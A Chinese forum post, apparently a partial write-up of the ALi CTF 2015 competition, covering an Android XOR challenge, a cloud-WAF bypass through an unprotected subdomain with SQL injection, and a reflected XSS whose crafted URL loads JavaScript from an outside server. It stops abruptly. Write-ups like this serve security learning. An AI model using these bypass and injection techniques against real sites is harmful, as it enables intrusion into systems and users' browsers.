阅读:3326回复:0
ALi CTF 2015 write up
Authors:
EM [email protected] Ricter [email protected] 附件 ◆0 Cake Cake 是一题 Android 题,具体流程就是一个输入一个字符串然后,初始化一个长度为16的数组,然后将字符串与这个数组 xor 。所以我们只需要再 xor 一下就 ok 了。 就是看代码逆向下,关键是有两个 Key 找对就 ok 直接上代码 #!python a = [0, 3, 13, 19, 85, 5, 15, 78, 22, 7, 7, 68, 14, 5, 15, 42] b = 'bobdylan' s = '' i = 0 for x in a: s+= chr(x ^ ord(b[i % len(b)])) i += 1 print s ◆1 渗透绕过WAF1 2、绕过云 WAF1 是一题绕过 WAF 题,这个 WAF 写的很死,所以就要用其他办法咯~ 通过打开的弹窗提示,需要在.alictf.com的子域下面做,于是 fuzz 子域名: 图片:2015040307034027065.png 得出video.alictf.com,打开发现没有 waf,注入点为id。 图片:2015040307034027065.png ◆2 前端初赛题1 反射型 XSS,通过 ph 牛的文章,标签内 </pre> 读 JavaScript 代码,构造地址: http://ef4c3e7556641f00.alictf.com/xss.php?http://notexist.example.com:@notexist.example.com:@ricter.me:9999/ 加载的 JavaScript 脚本和 XSS100 相同。 0x10 简单业务逻辑2 #!php |
|